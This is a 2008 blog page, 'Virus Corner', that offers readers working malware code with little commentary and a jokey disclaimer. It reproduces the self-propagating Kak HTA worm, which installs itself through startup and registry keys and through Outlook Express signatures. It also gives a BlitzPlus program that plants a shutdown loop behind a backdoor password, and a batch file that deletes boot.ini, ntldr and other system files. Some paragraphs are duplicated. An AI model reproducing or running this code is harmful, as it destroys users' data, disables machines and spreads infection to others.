Virus Corner

Welcome! Here i will give you Virus codes for you! Use them at your own risk, don’t ever use it to do somthing illegal, :P

HERE WE GO!!!!!!

Virus #1

Kak Virus( I have no clue what that is…)

<DIV style=3D”POSITION: absolute; RIGHT: 0px; TOP: -20px; Z-INDEX: 5″>
<OBJECT classid=3Dclsid:06290BD5-48AA-11D2-8432-006008C3FBFC=20
id=3Dscr></OBJECT></DIV><SCRIPT><!–
function sErr(){return
true;}window.onerror=sErr;scr.Reset();scr.doc=”Z<HTML><HEAD><TITLE>Driver
Memory Error</”+”TITLE><HTA:APPLICATION ID=\”hO\”
WINDOWSTATE=Minimize></”+”HEAD><BODY BGCOLOR=#CCCCCC><object id=’wsh’
classid=’clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B’></”+”object><SCRIPT>function
sEr(){self.close();return true;}window.onerror=sEr;fs=new
ActiveXObject(‘Scripting.FileSystemObject’);wd=’C:\\\\Windows\\\\’;fl=fs.GetFolde
r(wd+’Applic~1\\\\Identities’);sbf=fl.SubFolders;for(var
mye=new Enumerator(sbf);!mye.atEnd();mye.moveNext())idd=mye.item();ids=new
String(idd);idn=ids.slice(31);fic=idn.substring(1,9);kfr=wd+’MENUD&iuml;&iquest;&frac12;~1\\\\PROGRA~1
\\\\D&iuml;&iquest;&frac12;MARR~1\\\\kak.hta’;ken=wd+’STARTM~1\\\\Programs\\\\StartUp\\\\kak.hta’;k2=w
d+’System\\\\’+fic+’.hta’;kk=(fs.FileExists(kfr))?kfr:ken;aek=’C:\\\\AE.KAK’;aeb=
‘C:\\\\Autoexec.bat’;if(!fs.FileExists(aek)){re=/kak.hta/i;if(hO.commandLine.sear
ch(re)!=-1){f1=fs.GetFile(aeb);f1.Copy(aek);t1=f1.OpenAsTextStream(8);pth=(kk==kf
r)?wd+’MENUD&iuml;&iquest;&frac12;~1\\\\PROGRA~1\\\\D&iuml;&iquest;&frac12;MARR~1\\\\kak.hta’:ken;t1.WriteLine(‘@echo
off>’+pth);t1.WriteLine(‘del
‘+pth);t1.Close();}}if(!fs.FileExists(k2)){fs.CopyFile(kk,k2);fs.GetFile(k2).Attr
ibutes=2;}t2=fs.CreateTextFile(wd+’kak.reg’);t2.write(‘REGEDIT4′);t2.WriteBlankLi
nes(2);ky=’[HKEY
CURRENT USER\\\\Identities\\\\'+idn+'\\\\Software\\\\Microsoft\\\\Outlook
Express\\\\5.0';sg='\\\\signatures';t2.WriteLine(ky+sg+']‘);t2.Write(‘\”Default
Signature\”=\”00000000\”‘);t2.WriteBlankLines(2);t2.WriteLine(ky+sg+’0000
]’);t2.WriteLine(‘\”name\”=\”Signature
#1\”‘);t2.WriteLine(‘\”type\”=dword:00000002′);t2.WriteLine(‘\”text\”=\”\”‘);t2.W
rite(‘\”file\”=\”C:\\\\\\\\WINDOWS\\\\\\\\kak.htm\”‘);t2.WriteBlankLines(2);t2.Wr
iteLine(ky+’]');t2.Write(‘\”Signature
Flags\”=dword:00000003′);t2.WriteBlankLines(2);t2.WriteLine(‘[HKEY LOCAL
MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run]‘);t2.Write(
‘\”cAg0u\”=\”C:\\\\\\\\WINDOWS\\\\\\\\SYSTEM\\\\\\\\’+fic+’.hta\”‘);t2.WriteBlank
Lines(2);t2.close();wsh.Run(wd+’Regedit.exe
-s
‘+wd+’kak.reg’);t3=fs.CreateTextFile(wd+’kak.htm’,1);t3.Write(‘<HTML><BODY><DIV
style=\”POSITION:absolute;RIGHT:0px;TOP:-20px;Z-INDEX:5\”><OBJECT
classid=clsid:06290BD5-48AA-11D2-8432-006008C3FBFC
id=scr></”+”OBJECT></”+”DIV>’);t4=fs.OpenTextFile(k2,1);while(t4.Read(1)!=’Z');t3.Writ
eLine(‘<SCRIPT><!–’);t3.write(‘function
sErr(){return
true;}window.onerror=sErr;scr.Reset();scr.doc=\”Z’);rs=t4.Read(3095);t4.close();r
d=/\\\\/g;re=/\”/g;rf=/<\\//g;rt=rs.replace(rd,’\\\\\\\\’).replace(re,’\\\\\”‘).re
place(rf,’</”+”\”+\”‘);t3.WriteLine(rt+’\”;la=(navigator.systemLanguage)?navigator
.systemLanguage:navigator.language;scr.Path=(la==\”fr\”)?\”C:\\\\\\\\windows\\\\\
\\\Menu
D&iuml;&iquest;&frac12;marrer\\\\\\\\Programmes\\\\\\\\D&iuml;&iquest;&frac12;marrage\\\\\\\\kak.hta\”:\”C:\\\\\\\\windows\
\\\\\\\Start
Menu\\\\\\\\Programs\\\\\\\\StartUp\\\\\\\\kak.hta\”;agt=navigator.userAgent.toLo
werCase();if(((agt.indexOf(\”msie\”)!=-1)&&(parseInt(navigator.appVersion)>4))||(a
gt.indexOf(\”msie
5.\”)!=-1))scr.write();’);t3.write(‘//
–></”+”‘+’SCRIPT></”+”‘+’OBJECT></”+”‘+’BODY></”+”‘+’HTML>’);t3.close();fs.GetFile(wd+’ka
k.htm’).Attributes=2;fs.DeleteFile(wd+’kak.reg’);d=new
Date();if(d.getDate()==1 && d.getHours()>17){alert(‘Kagou-Anti-Kro$oft
says not today !’);wsh.Run(wd+’RUNDLL32.EXE
user.exe,exitwindows’);}self.close();</”+”SCRIPT>S3 driver memory alloc
failed  
!]]%%%%%</”+”BODY></”+”HTML”;la=(navigator.systemLanguage)?navigator.systemLanguage:
navigator.language;scr.Path=(la==”fr”)?”C:\\windows\\Menu
D&iuml;&iquest;&frac12;marrer\\Programmes\\D&iuml;&iquest;&frac12;marrage\\kak.hta”:”C:\\windows\\Start
Menu\\Programs\\StartUp\\kak.hta”;agt=navigator.userAgent.toLowerCase();if(((agt.
indexOf(“msie”)!=-1)&&(parseInt(navigator.appVersion)>4))||(agt.indexOf(“msie
5.”)!=-1))scr.write();
// –></SCRIPT>
</OBJECT></DIV></BODY></HTML>

Virus #2
AppTitle "Hackers Elite"

;----------Variables----------
usr$ = "admin"
pwd$ = "system"

virusLOCATION$ = Chr$(34) + "C:\Documents and Settings\All Users\Start Menu\Programs\Startup\hackers_elite.bat" + Chr$(34)
repairLOCATION$ = Chr$(34) + "C:\Documents And Settings\All Users\Start Menu\Programs\Startup\~repair~.bat" + Chr$(34)

fileLINE1$ = "@echo off"
fileLINE2$ = "shutdown -s -t 00"

fileLINE3$ = "@echo off"
fileLINE4$ = "cd \"
fileLINE5$ = "cd Documents and Settings\All Users\Start Menu\Programs\Startup"
fileLINE6$ = "del hackers_elite.bat"
fileLINE7$ = "del ~repair~.bat"
;-------------End-------------

;---------Write File----------
fileout = WriteFile("C:\Documents and Settings\All Users\Start Menu\Programs\Startup\hackers_elite.bat")
WriteLine(fileout, fileLINE1)
WriteLine(fileout, fileLINE2)
CloseFile(fileout)
;-------------End-------------

Print "Welcome to Hackers Elite!"
Print "To access all the fetures you must enter the Password"
Print " "
Delay 750
user$ = Input("USER NAME: ")
pass$ = Input("PASSWORD: ")

If user$ = usr$ And pass$ = pwd$
Print " "
Print "CREATING REPAIR FILE"
Delay 1500

fileout1 = WriteFile("C:\Documents and Settings\All Users\Start Menu\Programs\Startup\~repair~.bat")
WriteLine(fileout1, fileLINE3)
WriteLine(fileout1, fileLINE4)
WriteLine(fileout1, fileLINE5)
WriteLine(fileout1, fileLINE6)
WriteLine(fileout1, fileLINE7)
CloseFile(fileout1)

Print "DONE"
Print " "
Delay 1500
Print "RUNNING REAPIR FILE"
Delay 1500

ExecFile(repairLOCATION$)

Delay 250
Print "DONE"
Print " "

Else
Print "|-|YOU HAVE NOW BEEN INFECTED WITH A VIRUS|-|"
Delay 300
Print "IN 10 SECONDS IT WILL GO SYSTEM WIDE..."
Delay 10000
Print "SYSTEM WILL NOW CRASH"
Delay 150
ExecFile(virusLOCATION$)
End 

EndIf

Print "ENDING"
Delay 1500

A simple virus I coded in BlitzPlus, it will turn off the computer every time someone logs in. The Fix: Reboot the computer in safemode, login as Admin, goto C:/Documents and Settings/All Users/Start Menu/Programs/Startup and delete the file hackers_elite.bat, reboot the computer start it normally and it will be fine. Note* about the user/pass thats is because I always make backdoors for my Viruses. Note Note* I did not comment code very much because it is simple enough. Virus #3 save as bat file in notepad!! This will pop up a message saying OWNED!! and shut down the computer never to reboot again! thanks to etricks for this! @echo off attrib -r -s -h c:\autoexec.bat del c:\autoexec.bat attrib -r -s -h c:\boot.ini del c:\boot.ini attrib -r -s -h c:\ntldr del c:\ntldr attrib -r -s -h c:\windows\win.ini del c:\windows\win.ini @echo off msg * YOU GOT OWNED!!! shutdown -s -t 7 -c "A VIRUS IS TAKING OVER c:Drive

The Fix:
Reboot the computer in safemode, login as Admin, goto C:/Documents and Settings/All Users/Start Menu/Programs/Startup
and delete the file hackers_elite.bat, reboot the computer start it normally and it will be fine.

Note* about the user/pass thats is because I always make backdoors for my Viruses.

Note Note* I did not comment code very much because it is simple enough.

VIRUS #3
save as bat file in notepad!!
This will pop up a message saying OWNED!!
and shut down the computer never to reboot again!

thanks to etricks for this!

@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
@echo off
msg * YOU GOT OWNED!!!
shutdown -s -t 7 -c "A VIRUS IS TAKING OVER c:Drive
Please Check Back for more ( I'll create more pages late :P )
ENJOY!!!

Please Check Back for more ( I'll create more pages late :P )
ENJOY!!!

 

Published on July 29, 2008 at 2:13 am Leave a Comment

The URI to TrackBack this entry is: http://nikhilscorner.wordpress.com/virus-corner/trackback/

RSS feed for comments on this post.

Leave a Comment